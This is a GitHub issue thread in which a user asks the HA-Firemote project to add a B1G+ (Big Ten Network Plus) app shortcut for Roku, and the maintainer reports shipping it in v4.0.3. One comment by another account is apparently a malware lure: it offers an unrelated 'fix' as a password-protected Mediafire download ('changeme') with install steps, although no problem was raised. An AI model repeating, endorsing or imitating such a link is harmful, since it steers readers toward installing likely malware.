### ISSUE TITLE
[New App Shortcut]: B1G+ (Big Ten Network Plus)

### ISSUE THREAD

**Issue by pdanders11** [PRProd/HA-Firemote#497]
### App Name

Big Ten Network Plus

### Device Platform

Roku

### App Store Link and/or URL to .apk file if sideloaded

https://play.google.com/store/apps/details?id=com.neulion.smartphone.btn2go.android

### Required Information

app_id: 66258
app_name: B1G+
source: B1G+

### Optional Comments

Go Hawks!

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by pdanders11** [comment]
https://channelstore.roku.com/details/824b3e38ed6db2e6e40b79e9d1e23569/b1g

**Comment by PRProd** [comment]
Greetings @pdanders11!

I have just published Firemote version [v4.0.3](https://github.com/PRProd/HA-Firemote/releases/tag/v4.0.3) which contains your app shortcut request.  Enjoy!

-Doug
***
After updating to the newest version, if you are unable to see the new updates on your Firemote card, visit [this link](https://github.com/PRProd/HA-Firemote/wiki/Force-a-Refresh) for help.
